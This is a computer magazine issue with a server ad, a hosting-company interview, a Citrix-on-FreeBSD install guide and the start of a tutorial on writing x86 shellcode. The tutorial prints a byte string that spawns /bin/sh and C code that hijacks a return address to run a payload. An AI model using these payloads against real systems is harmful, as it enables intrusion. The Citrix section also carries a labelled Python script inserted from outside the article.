iX-Triton TwinBlade Servers: The Easy-to-Manage, Greener Way to Serve
Greenest, most energy-efficient blade server in the industry!




The new Triton TwinBlade Server is the most technologically advanced blade server system in the industry, 
and the ideal solution for power-efficiency, density, and ease of management. 


The Triton TwinBlade Server supports up to 120 DP servers with 240 Intel® Xeon® 5600/5500 series processors per 42U rack, achieving an unmatched 0.35U per DP node. Up to two 4x QDR (40 Gbps) InfiniBand switches, 10GbE switches or pass-through modules give the TwinBlade the bandwidth to support the most demanding applications.


With N+1 redundant, high efficiency (94%) 2500W power supplies, the TwinBlade is the Greenest, most energy-efficient blade server in the industry. The energy saved by the iX-Triton TwinBlade Server will keep the environment cleaner and greener, while leaving the green in your bank account.


Server management is also simple with the Triton TwinBlade Server. Remote access is available through SOL (Serial Over LAN), KVM, and KVM over IP technologies. A separate controller processor allows all of the Triton's remote management and monitoring to function regardless of system failures, offering true Lights Out Management.


Using the Triton’s management system, 
administrators can remotely control 
TwinBlades, power supplies, cooling 
fans, and networking switches. Users 
may control the power remotely to 
reboot and reset the Triton TwinBlade 
Center and individual Twin Blades, and 
may also monitor temperatures, power 
status, fan speeds, and voltage. 


For more information on the iX-Triton 
TwinBlade, or to request a quote, visit: 


http://www.iXsystems.com/tritontwinblade 


20 Server Compute Nodes in 7U of Rack Space 


The iX-TB4X2 chassis holds 10 TwinBlade servers and each 
TwinBlade supports two nodes. This gives the iX-TB4X2 chassis the 
ability to house 20 nodes in 7U of rack space. The powerful Triton 
TwinBlade achieves 0.35U per dual-processor node, and is twice as 
dense as the previous generation of dual-processor blades. 


A fully-loaded iX-Triton TwinBlade supports 40 Intel® Xeon® 5600/5500 series processors and up to 2.5 TB DDR 1333/1066/800MHz ECC Registered DIMM memory. In a 42U rack this translates into 120 nodes with 240 Intel® Xeon® 5600/5500 series processors and 15 TB DDR 1333/1066/800MHz ECC Registered DIMM memory.


» By replacing 1U servers with TwinBlade servers, the power 
savings of the iX-TB4X2 can reach more than $1000* per 
year, per server with reduced cooling costs added in. 


» Replacing 1U rackmount servers with an iX-TB4X2 Twin 
Blade can reduce carbon dioxide emissions by over 5.5 
metric tons.** 


» The iX-Triton TwinBlade delivers the most energy-efficient blade server in the industry with four N+1 redundant, high efficiency (94%) 2500W power supplies.


* Electricity costs vary by location. 


** According to Energy Information Agency (a statistical agency of the U.S. Department of Energy), 
saving one kilowatt hour of electricity reduces carbon dioxide emissions by 1.43 pounds. 


Call iXsystems toll free or visit our website today! 
+1-800-820-BSDi | www.iXsystems.com 


Intel, the Intel logo, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the U.S. and other countries.


Key features: 


Up to 10 dual-node TwinBlades in a 7U 
Chassis, 6 Chassis per 42U rack 
Remotely manage and monitor 
TwinBlades, power supplies, cooling fans, 
and networking switches 

Hardware Health Monitor 

Virtual Media Over Lan (Virtual USB, 
Floppy/CD, and Drive Redirection) 
Integrated IPMI 2.0 w/ remote KVM over 
LAN/IP 

Remote Power Control 

Supports one hot-plug management 
module providing remote KVM and IPMI 
2.0 functionalities 

Up to four N+1 redundant, hot-swap 
2500W power supplies 

Up to 16 cooling fans 


Each of the TwinBlade's two nodes features:

Intel® Xeon® processor 5600/5500 series, with QPI up to 6.4 GT/s


Intel® 5500 Chipset 


Up to 128GB DDR3 1333/ 1066/ 800MHz 
ECC Registered DIMM / 32GB Unbuffered 
DIMM 


Intel® 82576 Dual-Port Gigabit Ethernet 
2 x 2.5" Hot-Plug SATA Drive Trays 
Integrated Matrox G200eW Graphics 


Mellanox ConnectX QDR InfiniBand 40Gbps or 10GbE support (Optional)

Powerful. Intelligent.
Dear Readers!

The calendar is showing that autumn is here, but the weather still reminds us about the summer. Wherever you are and whatever you are doing - take a break and look into this issue.

It might seem a little bit different to you this time, let us know how you feel about it.

In this issue you will find the second part of Daniele's article: Network Monitoring with Nagios and OpenBSD.

Some of the articles will mention Linux this time, but don't worry - it is just to make clear the differences between these two OS.

You will find some information about Citrix and Festival in this issue and see some new authors contributing.

Don't forget about answering our surveys, they are really useful for us. And we are still looking for authors for the Russian version of BSD Magazine, please feel free to send us your feedback.

Thank you and enjoy your reading!

Thank you!
Olga Kartseva
Editor in Chief
olga.kartseva@software.com.pl


Editor in Chief: Olga Kartseva, olga.kartseva@software.com.pl
Contributing: Rob Somerville, Daniele Mazzocchio, Rashid N. Achilov, Joseba Mendez, Laura Michaels
Lukas Holt, Caryn Holt, Laura Michaels
Special thanks to: Marko Milic, Worth Bishop and Mike Bybee
Art Director: Ireneusz Pogroszewski
DTP: Ireneusz Pogroszewski
Senior Consultant/Publisher: Paweł Marciniak, pawel@software.com.pl
National Sales Manager: Ewa Łozowicka, ewa.lozowicka@software.com.pl
Marketing Director: Ewa Łozowicka
Executive Ad Consultant: Karolina Lesińska, karolina.lesinska@bsdmag.org
Advertising Sales: Olga Kartseva, olga.kartseva@software.com.pl

Publisher: Software Press Sp. z o.o. SK
ul. Bokserska 1, 02-682 Warszawa, Poland
worldwide publishing
tel: 1 917 338 36 31
www.bsdmag.org

Software Press Sp. z o.o. SK is looking for partners from all over the world. If you are interested in cooperation with us, please contact us via e-mail: editors@bsdmag.org

All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

The editors use automatic DTP system AUPUS

Mathematical formulas created by Design Science MathType™.
Interview

06 Interview with Dirk H. Schulz

Geniodata - Creative Data Solutions and Hosting. An interview with Dirk H. Schulz, which will give you a closer look at this company.


GET STARTED

10 Installing a Citrix Client on FreeBSD
Andrew L. Gould

Citrix, like Samba with WinBind and Rdesktop, help us access services and applications that may be required for our jobs but may not be available for FreeBSD. These ports are important for FreeBSD Advocacy because they help us integrate FreeBSD into a Windows enterprise environment.

In this article, I will discuss the steps for installing the current, xen application version of the Citrix client on FreeBSD 7.3 and FreeBSD 8.1.


HOW TO'S

14 Writing shellcode for Linux and BSD
Daniele Mazzocchio

A shellcode is a sequence of machine language instructions which an already-running program can be forced to execute by altering its execution flow through software vulnerabilities (e.g. stack overflow, heap overflow or format strings).

How To Convert Text to Voice Using Festival and Lame in FreeBSD
Diego Montalvo

In the summer of 2010 I grew a bit bored of building search based apps so I decided to brush the dust off of the old Bob Chatter code base. After tons of code rewriting and little sleep, Bob Chatter version 1.0.0 IM/Chat for WebOS devices was released. Release 1.0.1 of Bob Chatter includes a service which converts real-time chat instances into voice files. After realizing first hand there was little documentation regarding FreeBSD and voice technology, I decided to write a tutorial where others could learn from.

34 FreeBSD Squid proxy with Parental Controls How-To
Rob Somerville

Traditionally, web pages were served via a webserver such as Apache and transmitted via the network on port 80 to a web browser.

While pages and content were cached in the local browser cache, on larger networks it made sense to use a caching proxy such as Squid to reduce external traffic over the net for frequently fetched pages such as Google.

Network monitoring with Nagios and OpenBSD Part 2
Daniele Mazzocchio

One of Nagios' key features is its extensibility; new functionality can be easily added thanks to its plugin-based architecture, the external command interface and the Apache (http://www.kernel-panic.it/openbsd/nagios/httpd.apache.org/) web server. In this chapter, we will take a look at a few common issues that can be addressed with some of the most popular addons (http://www.nagiosexchange.org/) for Nagios.


LET'S TALK

52 The Difference Between FreeBSD and Ubuntu in a Not So Technical Way
Joshua Ebarvia

As a system administrator, I have been using various distributions of Linux and FreeBSD. I am comfortable in a mixed environment of *nix operating systems to provide network services. I will try to differentiate them and be as unbiased as possible so as not to start a flame war. I enjoy working with both systems and I like the way they are.
Dirk H. Schulz

genioDATA?

Why yet another hosting company?

Our first idea was not to offer hosting services. We needed an environment for engineering and testing — building complex systems at customers' sites means you have to do the engineering and testing somewhere else. And we were fed up with the typical test environment you puzzle up yourself — it had to be something professional, so we built up a production-like environment in one of the best data centers and defined processes and usage rules.


So you are not hosters from the beginning? 
No. We are system managers. We engineer, implement 
and run IT systems at our customers sites. 


Again: Why hosting then? 

That resulted from customer requests. When we told 
them of our engineering and testing data center, they 
wanted to place servers there and make use of certain 
services. The typical question was Couldn't you also do 
... for us there? 
But that still is far from what you now offer, isn't it?
To keep things under control then we had to do a lot of 
standardization and process definition. On one hand we 
had customers running systems in our data center who 
expected reliable performance, on the other hand we still 
needed our engineering environment. We had to look at 
our own projects with the same service and process view 
like at our customers’ projects. 

The answer was tough standardization and minute 
discipline. We ended up defining lots of products the two 
of us could use: the customers and ourselves. 


What is the difference to mainstream hosting? 
We offer hosting, knowledge and consulting in modularized 
packages. The customer solves on his own whatever he 
can solve and takes from us what he needs on top of 
that, be it technical items, support or plain knowledge. 
The customer alone defines the parts that make up his 
individual environment. 

He can, let's say, simply rent a virtual FreeBSD server and manage it on his own, but he can also outsource part of the servers' management to us or have us run a server farm completely. For administration on his own he can make use of community resources or use our offers of support and consulting, whatever suits him best.


That sounds great, but it still is not 
sufficient for uniqueness. Are there any USPs? 
Of course. We offer the biggest range of hosted 
operating systems — nearly all UNIXes and UNIX 
families are within. Additionally we are front runners 
when it comes to deploying enterprise techniques 
in still-not-enterprise-environments. You can easily 
rent a virtual NetBSD server, but where do you find a 
virtual NetBSD server that is run highly available in a 
clustered environment? Where can you have a MacOS 
X Server run including layered backups for additional 
data security? 


Enterprise environments are defined by prices that small and medium companies (SMCs) cannot pay, right?

No, there is no correlation there. In an enterprise 
environment the focus is on availability, in SMCs the focus 
is on getting it running somehow. 


But SMCs depend on their IT the same way 
enterprises do, don’t they? 

Yes, they do. Email archives and digital file systems are 
more important today than analog files have been in 
previous decades. They just have to be available. Access 
times have to be much shorter nowadays. "Always on" is 
needed. 


What can you do to move the focus in SMCs to availability?

No need to do that, they already start realizing 
necessities. Legal authorities are quite modern in their 
requirements: emails have to be archived completely, 
searchably and with a thorough security concept, 
otherwise penalties can be painful. Share holders and 
auditors demand revision proof document archives. 
Banks are evaluating their customers’ IT strategies 
during rating processes (i. e. your credit costs depend 
on your IT setup). All that forces SMCs to refocus their 
IT concepts. 


Can availability be bought? 

If yes: What has to be considered? 

No, availability is not a question of money, but of discipline. 
You always have to go four steps: 


• engineer a detailed concept,
• make a real world test of the concept before implementation,
• implement and run a comprehensive monitoring,
• do regular tests on every vital part.


If you leave out just one step, you risk losing the benefit 
of the others as well. 


Can you name examples? 

Yes. My favorite one is backups. It is not enough to make 
use of really good backup software, you always have to 
test restorability of your backed up data. Again and again 
we hear that customers can not restore their data in that 
one case of emergency — even with € 100.000 backup 
software. 


Operating Systems are the worlds in the IT universe. Get yours:

FreeBSD, NetBSD starting at € 25 

CentOS, OpenSuSE starting at € 25 

RHEL, SLES starting at € 42 

MacOS X Server starting at € 67 

Windows Server starting at € 42 


Got an idea? Make it live. 
In a genioDATA Server. 
It is not sufficient to implement something that should work — you have to make sure it does work. And if you do that, you can also use € 0 software as long as it does what you need. By the way: it is good practice to spend money if you get your money's worth. Spending lots of money to make yourself feel you have done the right thing just costs. You have to test thoroughly and regularly. Or get someone to do it for you.


How do you live up this principle 
in your hosting offers? 
For example there is lots of literature on what virtualization 
technique or product is the best — always comparing 
features. We could use that for decisions. Instead we test: 
150 virtual servers with 5 operating systems in a 6 months 
test run on each of them: Xen, VMware, Parallels Server, 
etc. We know very well now what is reliable and what 
is not. And we continue testing with every new release 
because the IT world changes fast. 

We rely on long term experience instead of well meant 
hopes. 


Let’s focus on money again: the four steps 

you named must be expensive for a small or 
medium company! 

That depends on how much previous engineering can be reused. If we have to invent something completely new there are resources to commit, but we have manifold experience, we can reuse details from previous projects. That lessens the required resources in engineering and pre-production testing (steps one and two). Monitoring can in most parts be covered with previous work.


Can you relate a success story to illustrate this? 
Yes. We have designed a middleware farm on base of 
Tomcat servers for a customer lately. We would have had 
to evaluate Tomcat session clustering against clustering 
via upstream load balancers, but we had run specialized 
tests on this comparison in another project for another 
customer. 

We only had to test if the customer’s software runs in 
the resulting environment. 


Of course our readers want to know what role 
BSD systems play in your projects! 

That depends. The advantages of BSD systems — mainly stability and very effective usage of resources — are really interesting in the enterprise market, but widely unknown there. When we propose the usage of BSD systems to hosting customers, they are afraid of not being able to migrate them to their own premises when they need to.

But if the customer just rents a defined service matrix 
— let’s say a tiered webserver farm with certain features 
— then we are free to use BSD systems and in some cases 
we do. 

Our infrastructure systems (mail gateways, name 
servers and the like) are BSD based more and more. 


What future do you see for BSD systems? 

In a few years they will play a bigger role in the enterprise 
market than today. One important difference to Linux 
systems is their focus on a small set of necessities. Linux 
is multifarious and manifold, but that also leads to lots of 
possible errors. It is intense work to set up a slim, focused 
Linux system. 

And then there is another phenomenon: The BSD 
developers claim to produce code of a better quality, and 
our long term tests seem to point at the same direction. 

Now it is not only us who experiences this. And word 
is spreading. This will have an impact on BSD in the 
enterprise market. 

Meanwhile we strain to make BSD systems useable for 
small and medium companies. 
Replicate your databases in high class data centers.
Have an email archive run by genioDATA that leaves nothing more to wish for.
Copy your files to several sites to plan for disaster recovery.

Need an ERP environment (enterprise resource planning)?
Have to operate a web(services) cluster with 99,999 % availability?
Need an email environment where not one email gets lost?

genioDATA engineers it.
genioDATA runs it.
You use it.

info@sccon.de www.geniodata.com/bsdi.html +49(0)8092 862568


GET STARTED

Installing a Citrix Client on FreeBSD

As our computing needs change, so does our criteria for selecting an operating system. Today, my job and my family are in different cities.

What you will learn...
• How to install Citrix on FreeBSD

What you should know...
• FreeBSD 8.1

I have a considerate boss who allows me to work from home on occasion. Since Citrix is my employer's chosen method for remote access, my first criterion for selecting an operating system for home use is its ability to run a Citrix client plugin.

Citrix, like Samba with WinBind and Rdesktop, help us access services and applications that may be required for our jobs but may not be available for FreeBSD. These ports are important for FreeBSD Advocacy because they help us integrate FreeBSD into a Windows enterprise environment.

In this article, I will discuss the steps for installing the current, xen application version of the Citrix client on FreeBSD 7.3 and FreeBSD 8.1.


Assumptions/requirements

• X Windows should be properly configured and running.
• Internet access should be properly configured.
• Linux emulation should be activated. (Add linux_enable="YES" to /etc/rc.conf and reboot)
• You should have root access via su.
• Ports should be up-to-date. For FreeBSD 8.1, I used the ports that were included on the installation DVD. For FreeBSD 7.3, I updated ports using portsnap on August 19, 2010.
• The Citrix client requires a Mozilla based internet browser. I recommend Firefox 3.5 or Seamonkey because they also work with the Java plugin.

The topics above are covered adequately by the FreeBSD handbook, which can be found here:

http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/


Linux Base Port

You will need to install a linux_base port for Linux emulation. The Citrix client works with linux_base-fc4 and linux_base-f8, but does not work with linux_base-f10. Unfortunately, FreeBSD 8.1 and PC-BSD 8.1 use linux_base-f10 by default.

For FreeBSD 7.3 simply execute:

    pkg_add -r linux_base-fc4

For FreeBSD 8.1, perform the following:

    echo "OVERRIDE_LINUX_BASE_PORT=f8" >> /etc/make.conf
    echo "OVERRIDE_LINUX_NONBASE_PORTS=f8" >> /etc/make.conf
    pkg_add -r linux_base-f8

You will need to rebuild any Linux applications you have installed previously.

PC-BSD 8.1 uses linux_base-f10 as a part of its base installation. Therefore, I do not recommend downgrading the linux_base port.


Installation

The port for the current Citrix client can be found at /usr/ports/net/citrix_xenapp. There is also an older client called citrix_ica; but Citrix does not keep links to old Citrix client files on its download web pages.

Using an internet browser

• Go to http://www.citrix.com/English/SS/downloads/details.asp?downloadID=3323. This will take you to the Linux download page for Citrix clients.
• Click on the Download button for the tar.gz file of Version 11.100.
• Save the file linuxx86-11.100.158406.tar.gz to your hard drive.

In a terminal, use the su command to become root and do the following:

• Change the current directory to the location where you saved the Citrix file.
• Change the name of the file to citrix_xenapp-linuxx86-11.100.158406.tar.gz.
• Copy the file to /usr/ports/distfiles/.
• Change the current directory to /usr/ports/net/citrix_xenapp/.
• Execute 'make install clean-depends'.

FreeBSD will now install all of the dependencies required for citrix_xenapp. When it's done, it will run the installation/configuration script for the Citrix client. You will be asked the questions below. I have noted the answers I used.


Question 1
Select a setup option:

1. Install Citrix Receiver for Linux 11.100
2. Remove Citrix Receiver for Linux 11.100
3. Quit Citrix Receiver for Linux 11.100 setup
Enter option number 1-3 [1]:
Answer: 1


Question 2
Please enter the directory in which Citrix Receiver for Linux is to be installed.
[default /usr/local/ICAClient]
or type "quit" to abandon the installation:
Answer: I pressed enter to accept the default.


Question 3
You have chosen to install Citrix Receiver for Linux 11.100 in /usr/local/ICAClient.
Proceed with installation? [default n]:
Answer: y


Question 4
CITRIX(R) LICENSE AGREEMENT

Use of this component is subject to the Citrix license covering the Citrix product(s) with which you will be using this component. This component is only licensed for use with such Citrix product(s).

Select an option:

1. I accept
2. I do not accept
Enter option number 1-2 [2]:
Answer: 1


Question 5
Could not find a browser installation on your system.
Is a browser installed? [default n]:
Answer: y


Question 6
Integration complete.
No GNOME or KDE directories were found, skipping integration.
return: Illegal number: -1
Do you want to install USB support? [default n]:
Answer: n


Question 7
Select a setup option:

1. Install Citrix Receiver for Linux 11.100
2. Remove Citrix Receiver for Linux 11.100
3. Quit Citrix Receiver for Linux 11.100 setup
Enter option number 1-3 [2]:
Answer: 3
Resources

http://people.freebsd.org/~tabthorpe/
http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/


Configuring Firefox

I chose Firefox 3.5 as my browser for using the Citrix client; but any Mozilla-based browser will suffice.

Open your browser using your normal, non-root user. From the menu, select Edit/Preferences. When the Preferences window opens, click on Content. If you have the Block pop-up windows option checked, click on the Exceptions button and add your company's Citrix server's website to the exceptions list. Then you can close the Preferences window.

In your browser, go to your Citrix server's website. At this point, I can only address matters as they occur with my employer's Citrix website. Your setup and experience may differ. Here's how it went for me:

1. I reached a login page, so I logged in.
2. I was taken to a page that stated that a Citrix client could not be detected. I was given options to download a client, state that a client was already installed, try again, or logoff. I selected the Already installed button.
3. The next page I saw was the Citrix menu page where I could select an application to run!

Once I selected an application, a window (see Figure 1) opened, asking me what to do with the file launch.ica.

Figure 1. A window asking what to do with the file launch.ica

Click on the Browse button and go to /usr/local/ICAClient/. Select the file wfica and click on the Open button. Then, so you don't have to repeat this step, check the box to Do this automatically for files like this from now on. This window should now look like Figure 2.

Figure 2. To prevent repeating this step, check the box

Once this has been done, you should be able to use the applications/services made available through the Citrix portal.

You may get a message that you have not chosen to trust the server's security certificate. The one I received is in Figure 3.

You have not chosen to trust "GlobalSign Root CA", the issuer of the server's security certificate (SSL error 61).

Figure 3. A message showing that you have not chosen to trust the server's security certificate

To fix this, download the certificate issuer's (GlobalSign Root CA in this case) root certificate and copy it to the directory:


/usr/local/ICAClient/keystore/cacerts/ 


It is important to emphasize here that importing the 
certificates into your browser’s keystore will not solve 
the problem. In fact, your browser may already have 
the certificates. The Citrix client does not use Firefox’s 
certificate keystore. 
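An added example (not code from the article) of how a careful admin would handle that step: compute the certificate's SHA-256 fingerprint and copy the file into /usr/local/ICAClient/keystore/cacerts/ only when it matches a fingerprint obtained from a trusted source, since everything in that directory is trusted by the ICA client. The demo uses constructed placeholder bytes rather than a real GlobalSign certificate, and the expected fingerprint is an assumption you must supply.

```python
"""Install a root CA certificate into the Citrix ICA client's own trust store
only after checking its fingerprint against a value obtained separately (the
CA's published fingerprint), since anything dropped into that directory is
trusted by the client. Added example, not code from the article; the paths and
the expected fingerprint are assumptions/placeholders."""
import base64
import hashlib
import re
import shutil
import tempfile
from pathlib import Path

# Directory the article identifies as the ICA client's keystore on FreeBSD.
ICA_CACERTS = Path("/usr/local/ICAClient/keystore/cacerts")

_PEM_BLOCK = re.compile(
    rb"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)


def pem_to_der(pem: bytes) -> bytes:
    """Return the DER bytes of the first certificate in a PEM file."""
    m = _PEM_BLOCK.search(pem)
    if m is None:
        raise ValueError("no PEM certificate block found")
    return base64.b64decode(b"".join(m.group(1).split()))


def sha256_fingerprint(der: bytes) -> str:
    """Colon-separated SHA-256 fingerprint, the form `openssl x509 -fingerprint
    -sha256` prints, so the value can be compared with a published one."""
    hexdigest = hashlib.sha256(der).hexdigest().upper()
    return ":".join(hexdigest[i:i + 2] for i in range(0, len(hexdigest), 2))


def _normalize(fp: str) -> str:
    return fp.replace(":", "").lower()


def install_ca_cert(pem_path: Path, expected_fp: str,
                    cacerts_dir: Path = ICA_CACERTS) -> Path:
    """Copy the certificate into the ICA keystore only if its SHA-256
    fingerprint matches `expected_fp` (case and colons are ignored)."""
    actual = sha256_fingerprint(pem_to_der(pem_path.read_bytes()))
    if _normalize(actual) != _normalize(expected_fp):
        raise ValueError(f"{pem_path.name}: fingerprint {actual} does not match "
                         f"expected {expected_fp}; not installing")
    cacerts_dir.mkdir(parents=True, exist_ok=True)
    dest = cacerts_dir / pem_path.name
    shutil.copyfile(pem_path, dest)
    return dest


def demo() -> tuple:
    """Exercise both paths in a temporary directory using a CONSTRUCTED
    placeholder body (not a real X.509 certificate); the file name only echoes
    the issuer named in the article."""
    with tempfile.TemporaryDirectory() as d:
        tmp = Path(d)
        fake_der = b"\x30\x82\x01\x00" + bytes(range(256))   # constructed bytes
        pem = (b"-----BEGIN CERTIFICATE-----\n" + base64.encodebytes(fake_der)
               + b"-----END CERTIFICATE-----\n")
        cert = tmp / "GlobalSign_Root_CA.pem"
        cert.write_bytes(pem)
        # Matching fingerprint: the file lands in the keystore directory.
        dest = install_ca_cert(cert, sha256_fingerprint(fake_der), tmp / "cacerts")
        # Wrong fingerprint: refused, nothing is written.
        try:
            install_ca_cert(cert, "00:" * 31 + "00", tmp / "cacerts")
            rejected = False
        except ValueError:
            rejected = True
        return dest.exists(), rejected


if __name__ == "__main__":
    print(demo())   # (True, True)
```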

At this point I was able to open and use the applications that were available on the Citrix portal, and access files on my employer's network. I hope you meet with the same, happy success.

I would like to thank port maintainer Thomas Abthorpe for his work on the Citrix client ports, his patience and his help.
Writing shellcode

A shellcode is a sequence of machine language instructions which an already-running program can be forced to execute by altering its execution flow through software vulnerabilities (e.g. stack overflow, heap overflow or format strings).

What you will learn...
• How to write a shellcode (verifying, examining etc.)

In other words, it is the notorious arbitrary code which can be run on systems affected by specific vulnerabilities. Typically, a shellcode looks like:


char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46"
                   "\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
                   "\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

that is a sequence of binary bytes (machine language).

The purpose of this document is to introduce some of 
the most widespread techniques for writing shellcode 
for Linux and *BSD systems running on the IA-32 (x86) 
architecture. 

You may wonder why you should learn anything about 
writing shellcode, since you can find a lot of ready-to-use 
shellcodes on the internet (after all, that's what copy and 
paste is for). Anyway, | think there are at least two good 
reasons: 


• first of all, it's always a good idea to analyze someone else's shellcode before executing it, just to know what's going to happen and to avoid bad surprises (we will discuss this later (http://www.kernel-panic.it/security/shellcode/shellcode6.html) in detail);
• besides this, keep in mind that the shellcode may have to run in the most diverse environments (input filtering, string manipulation, IDS...) and, therefore, you should be able to modify it accordingly.

What you should know...
• Have some basic knowledge on OpenBSD and Linux


Listing 1. Syscalls are defined in the /usr/src/linux/include/asm-i386/unistd.h file, and each is paired with a number

/* /usr/src/linux/include/asm-i386/unistd.h */
#ifndef _ASM_I386_UNISTD_H_
#define _ASM_I386_UNISTD_H_

/*
 * This file contains the system call numbers.
 */

#define __NR_exit        1
#define __NR_fork        2
#define __NR_read        3
#define __NR_write       4
#define __NR_open        5
#define __NR_close       6
#define __NR_waitpid     7
#define __NR_creat       8
[...]
A good knowledge of IA-32 assembly programming is assumed, since we won't dwell much on strictly programming topics, such as the use of registers, memory addressing or calling conventions.

Anyway, the appendix provides a short bibliography useful to anyone who wants to learn the basics of assembly programming or just to refresh one's memory. Last, a little knowledge of Linux, *BSD and C can be helpful...


Linux system calls

Though shellcodes can do almost anything, they're usually aimed at spawning a (possibly privileged) shell on the target machine (that's where the name shellcode comes from...).

The easiest and fastest way to execute complex tasks in assembler is using system calls (or syscalls, as their friends call them). System calls constitute the interface between user mode and kernel mode; in other words, system calls are the means by which userland applications obtain system services from the kernel, such as managing the filesystem, starting new processes, accessing devices, etc.

Syscalls are defined in the /usr/src/linux/include/asm-i386/unistd.h file, and each is paired with a number: see Listing 1.

There are normally two ways to execute a syscall:

• triggering the 0x80 software interrupt;
• using the libc wrapper functions.

The first method is much more portable, since it is based on system calls defined in the kernel code and, therefore, common to all Linux distributions. The second method, which uses the addresses of the C functions, instead, is hardly portable among different distributions, if not among different releases of the same distribution.


int 0x80

Let's take a look at the first method. When the CPU receives a 0x80 interrupt, it enters kernel mode and executes the requested function, getting the appropriate handler through the Interrupt Descriptor Table.

The syscall number must be specified in EAX, which will eventually contain the return value. The function arguments (up to six), instead, are passed in the EBX, ECX, EDX, ESI, EDI and EBP registers (exactly in this order and using only the necessary registers). If the function requires more than six arguments, you need to put them in a structure and store the pointer to the first argument
Listing 2. The man page tells us that it requires only one parameter

$ man 2 _exit

_EXIT(2)               Linux Programmer's Manual               _EXIT(2)

NAME
       _exit, _Exit - terminate the current process

SYNOPSIS
       #include <unistd.h>

       void _exit(int status);

Listing 3. Disassembling the compiled binary with gdb

$ gdb ./exit
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) break main
Breakpoint 1 at 0x804836a
(gdb) run
Starting program: /ramdisk/var/tmp/exit

Breakpoint 1, 0x0804836a in main ()
(gdb) disas main
Dump of assembler code for function main:
0x08048364 <main+0>:    push   %ebp
0x08048365 <main+1>:    mov    %esp,%ebp
0x08048367 <main+3>:    sub    $0x8,%esp
0x0804836a <main+6>:    and    $0xfffffff0,%esp
0x0804836d <main+9>:    mov    $0x0,%eax
0x08048372 <main+14>:   sub    %eax,%esp
0x08048374 <main+16>:   movl   $0x0,(%esp)
0x0804837b <main+23>:   call   0x8048284 <exit>
End of assembler dump.
(gdb)
in EBX. Note: Linux kernels prior to 2.4 didn't use the EBP register for passing arguments and, therefore, could pass only up to 5 arguments using registers.

After the syscall number and the parameters have been stored in the appropriate registers, the 0x80 interrupt is executed: the CPU enters kernel mode, executes the system call and returns the control to the user process.

To recap, to execute a system call, you need to:

• store the syscall number in EAX;
• store the syscall arguments in the appropriate registers or:
  • create an in-memory structure containing the syscall parameters,
  • store in EBX a pointer to the first argument;
• execute the 0x80 software interrupt.

Now let's take a look at the most classic example: the _exit(2) syscall. We know from the /usr/src/linux/include/asm-i386/unistd.h file (see above) that it is number 1. The man page tells us that it requires only one parameter (status): see Listing 2.

We will store that parameter in the EBX register. Therefore, the instructions for executing this syscall are:


Listing 4. Executing the system call

(gdb) disas exit
Dump of assembler code for function exit:
[...]
0x40052aed <exit+141>:  mov    0x8(%ebp),%eax
0x40052af0 <exit+144>:  mov    %eax,(%esp)
0x40052af3 <exit+147>:  call   0x400ced9c <_exit>
[...]
End of assembler dump.
(gdb) disas _exit
Dump of assembler code for function _exit:
0x400ced9c <_exit+0>:   mov    0x4(%esp),%ebx
0x400ceda0 <_exit+4>:   mov    $0xfc,%eax
0x400ceda5 <_exit+9>:   int    $0x80
0x400ceda7 <_exit+11>:  mov    $0x1,%eax
0x400cedac <_exit+16>:  int    $0x80
0x400cedae <_exit+18>:  hlt
0x400cedaf <_exit+19>:  nop
End of assembler dump.
(gdb)


Listing 5. Here are the first lines of the file (/usr/src/sys/kern/syscalls.master) on OpenBSD

/usr/src/sys/kern/syscalls.master

[...]
1       STD             { void sys_exit(int rval); }
2       STD             { int sys_fork(void); }
3       STD             { ssize_t sys_read(int fd, void *buf, \
                            size_t nbyte); }
4       STD             { ssize_t sys_write(int fd, \
                            const void *buf, \
                            size_t nbyte); }
5       STD             { int sys_open(const char *path, \
                            int flags, ... mode_t mode); }
6       STD             { int sys_close(int fd); }
7       STD             { pid_t sys_wait4(int pid, \
                            int *status, int options, \
                            struct rusage *rusage); } wait4
8       COMPAT_43       { int sys_creat(const char *path, \
                            mode_t mode); } ocreat


Listing 6. Getting the opcodes

$ nasm -f elf exit.asm
$ objdump -d exit.o

exit.o:     file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
   0:   bb 00 00 00 00          mov    $0x0,%ebx
   5:   b8 01 00 00 00          mov    $0x1,%eax
   a:   cd 80                   int    $0x80


Listing 7. Testing the opcodes

sc_exit.c

/* Opcodes taken from the objdump output of Listing 6 */
char shellcode[] = "\xbb\x00\x00\x00\x00"
                   "\xb8\x01\x00\x00\x00"
                   "\xcd\x80";

int main()
{
    int *ret;
    /* Point two dwords above the local variable: the saved return address */
    ret = (int *)&ret + 2;
    /* Overwrite it so that main() "returns" into the shellcode */
    (*ret) = (int) shellcode;
}
exit.asm

mov eax, 1          ; Number of the exit(2) syscall
mov ebx, 0          ; Status
int 0x80            ; Interrupt 0x80


libc

As we've stated before, a system call can also be executed by means of a C function. So let's take a look at how to achieve the same results as above using a simple C program:


Listing 8. Verifying the shellcode

$ strace ./sc_exit

execve("./sc_exit", ["./sc_exit"], [/* ... */]) = 0
uname({sys="Linux", node="Knoppix", ...}) = 0
brk(0)                                  = 0x8049588
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=60420, ...}) = 0
old_mmap(NULL, 60420, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40018000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY)        = 3
